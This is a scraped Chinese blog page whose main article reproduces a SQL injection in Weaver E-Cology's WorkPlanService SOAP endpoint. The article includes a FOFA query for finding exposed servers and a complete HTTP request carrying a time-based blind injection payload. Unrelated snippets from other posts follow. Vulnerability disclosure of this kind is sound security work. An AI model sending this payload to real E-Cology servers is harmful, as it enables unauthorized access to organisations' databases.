当前位置：首页 > news >正文

漏洞复现-F6-11泛微-E-Cology-SQL

news 2026/2/7 20:54:58

本文来自无问社区，更多漏洞信息可前往查看http://www.wwlib.cn/index.php/artread/artid/15575.html

0x01 产品简介

泛微协同管理应用平台e-cology是一套企业级大型协同管理平台

0x02 漏洞概述

该漏洞是由于泛微e-cology未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现 SQL 注入漏洞。

影响范围：泛微E-Cology9 < 10.65.0

0x03 复现环境

FOFO:app="泛微-OA（e-cology）"

POC

延时5秒
payload：

POST /services/WorkPlanService HTTP/1.1
HOST: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Connection: close<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn"><soapenv:Header/><soapenv:Body><web:deleteWorkPlan><!--type: string--><web:in0>(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)</web:in0><!--type: int--><web:in1>22</web:in1> </web:deleteWorkPlan></soapenv:Body>
</soapenv:Envelope>

效果图：

漏洞复现-F6-11泛微-E-Cology-SQL

本文来自无问社区，更多漏洞信息可前往查看http://www.wwlib.cn/index.php/artread/artid/15575.html 0x01 产品简介泛微协同管理应用平台e-cology是一套企业级大型协同管理平台 0x02 漏洞概述该漏洞是由于泛微e-cology未对用户的输入进行有效的过滤&#xff0…...

编程日记 2024/8/3 18:22:02

Turbo Boost 禁用

最近在做OAI NR的时候关闭CPU 睿频的时候出了一些问题，这里我把我找到的资料记录一下： 禁用 Turbo Boost 的过程可能会因不同的 BIOS/UEFI 和操作系统设置而有所不同。以下是一些可能的原因及解决方法： 可能的原因 BIOS/UEFI 设置问题: 你的…...

编程日记 2024/8/3 18:21:01

文章目录 [极客大挑战 2019]BuyFlag[BJDCTF2020]Easy MD5[HCTF 2018]admin第一种方法直接登录第二种方法 flack session伪造第三种方法Unicode欺骗 [MRCTF2020]你传你🐎呢[护网杯 2018]easy_tornadoSSTI注入 [ZJCTF 2019]NiZhuanSiWei [极客大挑战 2019]BuyFlag 一…...

编程日记 2024/8/3 18:20:00

【ubuntu系统】在虚拟机内安装Ubuntu

Ubuntu系统装机描述新装机后的常规配置， 虚拟机使用vbox terminal 打不开 CTRL ALT F3 进入命令行模式（需要返回桌面时CTRL ALT F1）root用户登入cd /etc/default vi locale LANG“en_US” 改成 LANG“en_US.UTF-8”保存修改后&…...

编程日记 2024/8/3 18:16:57

Python初学者必须掌握的基础知识点

Python初学者必须掌握的基础知识点包括数据类型与变量、控制结构（条件语句和循环语句）、基本数据结构（列表、元组、字典、集合）、函数与模块、以及字符串处理等。以下是对这些基础知识点及其对应代码的详细介绍： 1. …...

编程日记 2024/8/3 18:15:56

ESP32是什么？

ESP32是一款由乐鑫信息科技（Espressif Systems）推出的高度集成的低功耗系统级芯片（SoC），它结合了双核处理器、无线通信、低功耗特性和丰富的外设，特别适用于各种物联网（IoT）应用。以…...

编程日记 2024/8/3 18:14:55

jemalloc分析内存

分析内存泄漏过程中， 由于tcmalloc不能长时间开启heap profile（会不停涨内存，导致内存爆掉）.尝试换jemalloc. 交叉编译： git clone https://github.com/jemalloc/jemalloc.git./autogen.sh./configure --hostaarch64-…...

编程日记 2024/8/3 18:12:52

【QT】qss

目录基本语法设置全局样式问题分离样式代码方案1 方案2 选择器概况子控件选择器伪类选择器盒子模型修改控件样式示例按钮属性小结复选框属性小结输入框属性小结列表框属性小结渐变色示例： 菜单栏设置菜单栏的背景…...

编程日记 2024/8/3 18:10:50

Java处理大数据的技巧

大数据处理是现代计算机科学中的一个重要领域，通过高效的算法和工具，我们可以从大量数据中提取有价值的信息。本文将介绍一些处理大数据的技巧和策略，并讨论如何通过Java与MySQL实现高效的大数据处理。一、什么是大数据处理？ 大…...

编程日记 2024/8/3 18:08:48

JavaScript基础——JavaScript常见语句（判断语句、循环语句、控制流语句）

JavaScript提供了丰富的语句来控制程序的执行流程，包括用于条件判断的if、switch和三元运算符，以及用于循环的for、while、do...while、for...in和for...of。此外，还有控制流语句如break、continue和return。判断语句 if 语句 if 语句&…...

编程日记 2024/8/3 18:07:47

材质球向shader传值失败

unity中导入spine模型，当模型挂载SkeletonMecanim组件后，发现材质球向shader传值失败，改为SetPropertyBlock后可行。 //spine模型使用材质球传参数，当spine模型上挂载有SkeletonMecanim的情况下，会传值失败!!!!// for…...

编程日记 2024/8/3 18:05:46

【TDH社区版大事件】图分析、全文检索、小文件治理、数据开发工具通通都有！

星环科技大数据基础平台TDH社区版，在保留了商业版核心技术优势的基础上最大程度地降低了用户使用大数据技术的门槛与成本，具有更轻量、更简单、更易用等特性。此次TDH社区开发版、社区版、社区订阅版均发布了新版本，带来新的产品组件和新的…...

编程日记 2024/8/3 18:04:45

【反序列化漏洞】serial靶机详解

一、安装靶机首先创建新的虚拟机。然后选择客户机版本为Ubuntu 64位。然后选择使用现有磁盘，选择下载的vmdk磁盘文件即可。剩下的都是默认二、信息收集发现主机192.168.204.143 访问扫描端口nmap -A 192.168.204.143 -p-，发现只有ssh:22和http:8…...

编程日记 2024/8/3 18:03:44

C#列表按照日期进行从大到小排序

C#列表按照日期进行从大到小排序...

编程日记 2024/8/3 18:01:42

rt-thread每个线程状态切换方法

线程状态 RT-Thread 中线程的状态定义在 rt_thread.h 头文件中，通常包括以下几种状态： RT_THREAD_INIT：线程初始化状态。RT_THREAD_READY：线程就绪状态。RT_THREAD_SUSPEND：线程挂起状态。RT_THREAD_RUNNING&#xf…...

编程日记 2024/8/3 17:59:39

visual studio跳转到上一个/下一个光标处的快捷键设置

vscode能通过Alt左右箭头跳转到上/下一个光标处，这对于“点进函数看源码，看完后跳转到原来位置”是非常方便的。在Visual Studio中，有2种方法实现这样的功能。第一种，直接点击这两个按钮：（缺点是每次要用…...

编程日记 2024/8/3 17:57:37

网络基础命令配置复习 (基础华为设备)

目录一.前言二.Telnet远程登陆 2.1telnet介绍 2.2telnet的配置三.交换机基础配置四.致谢一.前言网络基础不仅是IT从业者的必备知识，也是日常生活中使用网络的人们应该了解的内容。通过学习和掌握这些基础知识，你将能更好地理解和利用现…...

编程日记 2024/8/3 17:56:36

在AspNetCoreRateLimit中，ClientRateLimiting 和 IpRateLimiting 都有的时候按谁的来

在AspNetCoreRateLimit中，当同时配置了ClientRateLimiting（基于客户端ID的速率限制）和IpRateLimiting（基于IP地址的速率限制）时，它们的应用方式主要取决于请求的特性和配置的设置。以下是对这两种速率限制方…...

编程日记 2024/8/3 17:55:35

PEP 8 – Python 代码风格指南中文版（五）

强制性：命名约定应避免的命名永远不要使用字符‘l’（小写字母el）、‘O’（大写字母oh）或‘I’（大写字母eye）作为单字符变量名。在某些字体中，这些字符与数字1和0难以区分。当想使…...

编程日记 2024/8/3 17:53:33

Spring中是如何实现IoC和DI的？

前言：在前一篇文章中对于IoC的核心思想进行了讲解，而本篇文章则从Spring的角度入手，体会Spring对于IoC是如何实现的。如果对IoC还有不太了解的可以阅读上一篇文章，相信一定会带来全新的收获：什么是IoC（控制…...

编程日记 2024/8/3 17:50:29

Docker 运行 Kafka 带 SASL 认证教程

Docker 运行 Kafka 带 SASL 认证教程 Docker 运行 Kafka 带 SASL 认证教程一、说明二、环境准备三、编写 Docker Compose 和 jaas文件docker-compose.yml代码说明：server_jaas.conf 四、启动服务五、验证服务六、连接kafka服务七、总结 Docker 运行 Kafka 带 SASL 认…...

编程新知 2026/1/23 4:15:03

Java - Mysql数据类型对应

Mysql数据类型java数据类型备注整型INT/INTEGERint / java.lang.Integer–BIGINTlong/java.lang.Long–––浮点型FLOATfloat/java.lang.FloatDOUBLEdouble/java.lang.Double–DECIMAL/NUMERICjava.math.BigDecimal字符串型CHARjava.lang.String固定长度字符串VARCHARjava.lang…...

编程新知 2025/12/14 11:45:25

高等数学（下）题型笔记（八）空间解析几何与向量代数

目录 0 前言 1 向量的点乘 1.1 基本公式 1.2 例题 2 向量的叉乘 2.1 基础知识 2.2 例题 3 空间平面方程 3.1 基础知识 3.2 例题 4 空间直线方程 4.1 基础知识 4.2 例题 5 旋转曲面及其方程 5.1 基础知识 5.2 例题 6 空间曲面的法线与切平面 6.1 基础知识 6.2…...

编程新知 2026/1/28 9:04:29

网络编程（UDP编程）

思维导图 UDP基础编程（单播） 1.流程图服务器：短信的接收方创建套接字 (socket)-----------------------------------------》有手机指定网络信息-----------------------------------------------》有号码绑定套接字 (bind)--------------…...

编程新知 2026/2/4 17:31:44